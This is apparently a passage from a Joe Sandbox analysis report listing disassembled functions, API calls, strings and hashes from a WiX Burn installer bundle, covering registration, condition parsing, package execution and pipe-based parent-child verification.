                                                            • Invalid value for @Action: %ls, xrefs: 0087EC52
                                                            • Failed to get @Id., xrefs: 0087EC62
                                                            • Failed to get @Action., xrefs: 0087EC69
                                                            • Action, xrefs: 0087EAD0
                                                            • RelatedBundle, xrefs: 0087EA50
                                                            • Failed to get RelatedBundle nodes, xrefs: 0087EA72
                                                            • Failed to get next RelatedBundle element., xrefs: 0087EC70
                                                            • Upgrade, xrefs: 0087EB50
                                                            • Failed to resize Patch code array in registration, xrefs: 0087EC43
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$CompareVariant$AllocClearFreeInit
                                                            • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
                                                            • API String ID: 702752599-259800149
                                                            • Opcode ID: 1ac31b0ec8055777112eb2aec3f7bbf998e758f8b730e950929466c57ed182fa
                                                            • Instruction ID: 07634776d92e197db1bd206aceff68c3027331f902950647073552d4380b06ee
                                                            • Opcode Fuzzy Hash: 1ac31b0ec8055777112eb2aec3f7bbf998e758f8b730e950929466c57ed182fa
                                                            • Instruction Fuzzy Hash: 1C71C27590461ABBCB11CA54C985EAEBBB4FF09724F208298F929E73C5D734ED11CB90
                                                            Function 008846DC Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 185fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,00884BF5,008BB4E8,?,feclient.dll,00000000,?,?), ref: 008846F3
                                                            • ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,00884BF5,008BB4E8,?,feclient.dll,00000000,?,?), ref: 00884714
                                                            • GetLastError.KERNEL32(?,00884BF5,008BB4E8,?,feclient.dll,00000000,?,?), ref: 0088471A
                                                            • ReadFile.KERNEL32(feclient.dll,00000000,008BB518,?,00000000,00000000,008BB519,?,00884BF5,008BB4E8,?,feclient.dll,00000000,?,?), ref: 008847A8
                                                            • GetLastError.KERNEL32(?,00884BF5,008BB4E8,?,feclient.dll,00000000,?,?), ref: 008847AE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastRead$CurrentProcess
                                                            • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
                                                            • API String ID: 1233551569-452622383
                                                            • Opcode ID: a5fdad2fb7e6fb9edb5e32bf2c0e1bff6e08ad5bc57035fc8347e6970acc0104
                                                            • Instruction ID: ad5e1ae2b4367456cd3e1a0457657252e4349baa3c3ed996871065bc0e330d1f
                                                            • Opcode Fuzzy Hash: a5fdad2fb7e6fb9edb5e32bf2c0e1bff6e08ad5bc57035fc8347e6970acc0104
                                                            • Instruction Fuzzy Hash: 3351A137D4022AB7DB21AA954C46F6E7A78FB01B20F115239BE15FB280E774DD4097E2
                                                            Function 008927FC Relevance: 36.9, APIs: 3, Strings: 18, Instructions: 145COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: StringVariant$AllocClearFreeInit
                                                            • String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
                                                            • API String ID: 760788290-1911311241
                                                            • Opcode ID: 278c3f96924c131af6a53bca2291158d27960e6315fadd178cf781a56219532a
                                                            • Instruction ID: 5406a8ea3bf74f7f77491abcc1bede1ae71fb26258164cc26ad893aab575ea92
                                                            • Opcode Fuzzy Hash: 278c3f96924c131af6a53bca2291158d27960e6315fadd178cf781a56219532a
                                                            • Instruction Fuzzy Hash: CB41DE71E84B2BB6CE2575644C03FAAB668FB11735F180329B930F63C1DB78D90496D1
                                                            Function 00878F72 Relevance: 35.4, APIs: 8, Strings: 12, Instructions: 430COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStringTypeW.KERNEL32(00000001,56008BDB,00000001,?,00879946,?,00000000,00000000,?,?,0087992E,?,?,00000000,?), ref: 00878FB2
                                                            Strings
                                                            • Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 00879162
                                                            • AND, xrefs: 008792BC
                                                            • NOT, xrefs: 008792DB
                                                            • Failed to set symbol value., xrefs: 00879060
                                                            • Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 008791DE
                                                            • -, xrefs: 00879118
                                                            • Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 00879408
                                                            • Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 00879380
                                                            • condition.cpp, xrefs: 00879084, 0087914E, 008791CA, 0087922E, 0087936C, 008793B0, 008793F4
                                                            • Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 00879098
                                                            • Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 008793C4
                                                            • Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 00879242
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: StringType
                                                            • String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
                                                            • API String ID: 4177115715-3594736606
                                                            • Opcode ID: 669703ed3a6c6081e1a2edf0df2390fe2359e57753f43d8ba48fb397b4c8aad7
                                                            • Instruction ID: 77b7845abc9d60b1ce4156fb85e4e33da968b9eaf919a8e66c572f82f38b3d73
                                                            • Opcode Fuzzy Hash: 669703ed3a6c6081e1a2edf0df2390fe2359e57753f43d8ba48fb397b4c8aad7
                                                            • Instruction Fuzzy Hash: C3F12171504305FFDB24CF58C889BBA7BA4FB04704F10C185F9A9DA289D3B5DA91CB85
                                                            Function 00891BB1 Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 212COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 00891CB8
                                                            • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 00891CD6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareHeapString$AllocateProcess
                                                            • String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeengine.cpp$forceReboot$scheduleReboot$success
                                                            • API String ID: 2664528157-1714101571
                                                            • Opcode ID: 8d318a5e6f82482441bfb9a1f931540c10bba0a5a025e070333af8a91e460a50
                                                            • Instruction ID: 2e360a8302cf6ffc55a524c113a320111488292fd9a3127746cdb899136ebcab
                                                            • Opcode Fuzzy Hash: 8d318a5e6f82482441bfb9a1f931540c10bba0a5a025e070333af8a91e460a50
                                                            • Instruction Fuzzy Hash: CC619030A4961BABCF10AB94CC4AEAEBBB5FF40720F244655E421EB390DB70DA009791
                                                            Function 008B77F7 Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 206COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 008B7857
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 008B787C
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 008B789C
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 008B78CF
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 008B78EB
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B7916
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B798D
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B79D9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$Compare$Free
                                                            • String ID: `<u$comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
                                                            • API String ID: 318886736-782967201
                                                            • Opcode ID: f2f7fb039835cee451e19ef3d7648a5624986513a465a70392cea6d1ccb52c6d
                                                            • Instruction ID: 1d94f3c4d36356f769ded311e9abd4c98d7aae62e8cbe61eb04ac2d944033620
                                                            • Opcode Fuzzy Hash: f2f7fb039835cee451e19ef3d7648a5624986513a465a70392cea6d1ccb52c6d
                                                            • Instruction Fuzzy Hash: 84612C71908219BBDB15DBA4CC45EEEBBB8FF44320F2003A5E521E63A1D735AE10DB90
                                                            Function 00886BCA Relevance: 31.9, APIs: 6, Strings: 12, Instructions: 351synchronizationthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0087D4A8: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00887040,000000B8,00000000,?,00000000,75C0B390), ref: 0087D4B7
                                                              • Part of subcall function 0087D4A8: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0087D4C6
                                                              • Part of subcall function 0087D4A8: LeaveCriticalSection.KERNEL32(000000D0,?,00887040,000000B8,00000000,?,00000000,75C0B390), ref: 0087D4DB
                                                            • CreateThread.KERNEL32(00000000,00000000,008857BD,?,00000000,00000000), ref: 00886E34
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00874522,?,008BB500,?,00874846,?,?), ref: 00886E43
                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00874522,?,008BB500,?,00874846,?,?), ref: 00886EA0
                                                            • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 00886F92
                                                            • CloseHandle.KERNEL32(00000000), ref: 00886F9B
                                                            • CloseHandle.KERNEL32(crypt32.dll,?,00000000,?,00000000,00000001,00000000), ref: 00886FB5
                                                              • Part of subcall function 0089BD05: SetThreadExecutionState.KERNEL32(80000001), ref: 0089BD0A
                                                            Strings
                                                            • UX aborted apply begin., xrefs: 00886C94
                                                            • Failed while caching, aborting execution., xrefs: 00886E98
                                                            • Failed to cache engine to working directory., xrefs: 00886D71
                                                            • Failed to set initial apply variables., xrefs: 00886D02
                                                            • core.cpp, xrefs: 00886C8A, 00886E67
                                                            • Failed to create cache thread., xrefs: 00886E71
                                                            • crypt32.dll, xrefs: 00886ECD, 00886EE7, 00886FB4
                                                            • Failed to elevate., xrefs: 00886D94
                                                            • Another per-machine setup is already executing., xrefs: 00886DC8
                                                            • Failed to register bundle., xrefs: 00886DEE
                                                            • Engine cannot start apply because it is busy with another action., xrefs: 00886C28
                                                            • Another per-user setup is already executing., xrefs: 00886CD8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$CriticalSectionThread$CompareCreateEnterErrorExchangeExecutionInterlockedLastLeaveMutexReleaseState
                                                            • String ID: Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
                                                            • API String ID: 2169948125-4292671789
                                                            • Opcode ID: 052b76cd00fa45005b54c77b7cd0ca8abaf1904dbd93f8dcfc5ea1c92c94533e
                                                            • Instruction ID: f64d6aca6e6cd4819f280fd43cbdea1dd971af6101ba25a857ad0f5d62e3bb44
                                                            • Opcode Fuzzy Hash: 052b76cd00fa45005b54c77b7cd0ca8abaf1904dbd93f8dcfc5ea1c92c94533e
                                                            • Instruction Fuzzy Hash: 97C1D071900219ABDF11AF64D885BEE37B9FF04714F144179FE09EE242EB709990CBA2
                                                            Function 008B8134 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 309COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 008B8161
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 008B817C
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 008B821F
                                                            • CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,008BB518,00000000), ref: 008B825E
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 008B82B1
                                                            • CompareStringW.KERNEL32(0000007F,00000000,008BB518,000000FF,true,000000FF), ref: 008B82CF
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 008B8307
                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 008B844B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
                                                            • API String ID: 1825529933-3037633208
                                                            • Opcode ID: 9b1b928b512d27d03b046a0df4e72309e515cf091f49fe575af44765989c4845
                                                            • Instruction ID: 6cb56af06bf1f76ecabded573bd3f875d96403f48b4cad7fdab2ab639caa509b
                                                            • Opcode Fuzzy Hash: 9b1b928b512d27d03b046a0df4e72309e515cf091f49fe575af44765989c4845
                                                            • Instruction Fuzzy Hash: BCB15731644606EBCB209F58CC81F9A7BAAFB44720F218619F979EB3D5DB70E841CB14
                                                            Function 0088E3C8 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 146registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0088E2AF: LoadBitmapW.USER32(?,00000001), ref: 0088E2E5
                                                              • Part of subcall function 0088E2AF: GetLastError.KERNEL32 ref: 0088E2F1
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0088E429
                                                            • RegisterClassW.USER32(?), ref: 0088E43D
                                                            • GetLastError.KERNEL32 ref: 0088E448
                                                            • UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 0088E54D
                                                            • DeleteObject.GDI32(00000000), ref: 0088E55C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
                                                            • String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
                                                            • API String ID: 164797020-2188509422
                                                            • Opcode ID: a83fd8d3a867d3d3d93f0388d599b70d235127ea3a1b66c2cac3d1312cf3a287
                                                            • Instruction ID: 29bd9e48bd0ce2d6a6959074d75ac15dab04a82b9f80dd603dec7c1c4d4dbfce
                                                            • Opcode Fuzzy Hash: a83fd8d3a867d3d3d93f0388d599b70d235127ea3a1b66c2cac3d1312cf3a287
                                                            • Instruction Fuzzy Hash: 1B41D77294061ABFDB11ABE4DD09EAEBBB8FF08714F100225FA15F6250E7749D04CB91
                                                            Function 00899DE1 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 233threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,0089BC85,00000001), ref: 00899E46
                                                            • GetLastError.KERNEL32(?,0089BC85,00000001), ref: 00899FB6
                                                            • GetExitCodeThread.KERNEL32(00000001,00000000,?,0089BC85,00000001), ref: 00899FF6
                                                            • GetLastError.KERNEL32(?,0089BC85,00000001), ref: 0089A000
                                                            Strings
                                                            • Failed to execute MSP package., xrefs: 00899ECB
                                                            • Failed to get cache thread exit code., xrefs: 0089A031
                                                            • Invalid execute action., xrefs: 0089A056
                                                            • Cache thread exited unexpectedly., xrefs: 0089A047
                                                            • Failed to execute dependency action., xrefs: 00899F36
                                                            • Failed to execute compatible package action., xrefs: 00899F73
                                                            • Failed to load compatible package on per-machine package., xrefs: 00899F5C
                                                            • apply.cpp, xrefs: 00899FDD, 0089A027
                                                            • Failed to execute EXE package., xrefs: 00899E7D
                                                            • Failed to execute MSI package., xrefs: 00899EA6
                                                            • Failed to wait for cache check-point., xrefs: 00899FE7
                                                            • Failed to execute MSU package., xrefs: 00899EFB
                                                            • Failed to execute package provider registration action., xrefs: 00899F17
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
                                                            • String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
                                                            • API String ID: 3703294532-2662572847
                                                            • Opcode ID: 64a2ee6e9fd6023acc1edeb57d85a38bcafd27f78521c744af8af91b7dfa8c4c
                                                            • Instruction ID: f099f9485320afab8df97aae508a4cea5d666f0fdd5a2e1fcdf82678ea869573
                                                            • Opcode Fuzzy Hash: 64a2ee6e9fd6023acc1edeb57d85a38bcafd27f78521c744af8af91b7dfa8c4c
                                                            • Instruction Fuzzy Hash: 57718B70A0022AEBDF14EF68C841EBEBBB8FB44B14F154169F945E7240D674DE009BA1
                                                            Function 0087F210 Relevance: 29.9, APIs: 3, Strings: 14, Instructions: 183registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008B3AF1: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 008B3B3E
                                                            • RegCloseKey.ADVAPI32(00000000,?,008C0D10,00020006,00000000,?,00000000,00000000,00000000,?,00000000,00000001,00000000,00000000), ref: 0087F440
                                                              • Part of subcall function 008B14A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0087F28D,008C0D10,Resume,00000005,?,00000000,00000000,00000000), ref: 008B14BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseValueVersion
                                                            • String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$burn.runonce$registration.cpp
                                                            • API String ID: 2348918689-2631711097
                                                            • Opcode ID: b892c255659bbc68a0157696b69adc830cbc8f74e18b3772edaa69cbed5ff9c8
                                                            • Instruction ID: 56c5f7d607a8cf9e1e5a529be59e0246ecf2d0d8dde0002c68a7146b86d4e273
                                                            • Opcode Fuzzy Hash: b892c255659bbc68a0157696b69adc830cbc8f74e18b3772edaa69cbed5ff9c8
                                                            • Instruction Fuzzy Hash: E751E332D4062AFBCF219AA58C4AFAEB674FB00724F108139FA18F6356D774D9509B85
                                                            Function 0089CC91 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 174processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32(74DE8FB0,00000002,00000000), ref: 0089CC9D
                                                              • Part of subcall function 00884D8D: UuidCreate.RPCRT4(?), ref: 00884DC0
                                                            • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,00892401,?,?,00000000,?,?,?), ref: 0089CD7B
                                                            • GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 0089CD85
                                                            • GetProcessId.KERNEL32(00892401,?,?,00000000,?,?,?,?), ref: 0089CDBD
                                                              • Part of subcall function 008854DC: lstrlenW.KERNEL32(?,?,00000000,?,008BB500,?,00000000,?,0087452F,?,008BB500), ref: 008854FD
                                                              • Part of subcall function 008854DC: GetCurrentProcessId.KERNEL32(?,0087452F,?,008BB500), ref: 00885508
                                                              • Part of subcall function 008854DC: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0087452F,?,008BB500), ref: 0088553F
                                                              • Part of subcall function 008854DC: ConnectNamedPipe.KERNEL32(?,00000000,?,0087452F,?,008BB500), ref: 00885554
                                                              • Part of subcall function 008854DC: GetLastError.KERNEL32(?,0087452F,?,008BB500), ref: 0088555E
                                                              • Part of subcall function 008854DC: Sleep.KERNEL32(00000064,?,0087452F,?,008BB500), ref: 00885593
                                                              • Part of subcall function 008854DC: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0087452F,?,008BB500), ref: 008855B6
                                                              • Part of subcall function 008854DC: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0087452F,?,008BB500), ref: 008855D1
                                                              • Part of subcall function 008854DC: WriteFile.KERNEL32(?,0087452F,008BB500,00000000,00000000,?,0087452F,?,008BB500), ref: 008855EC
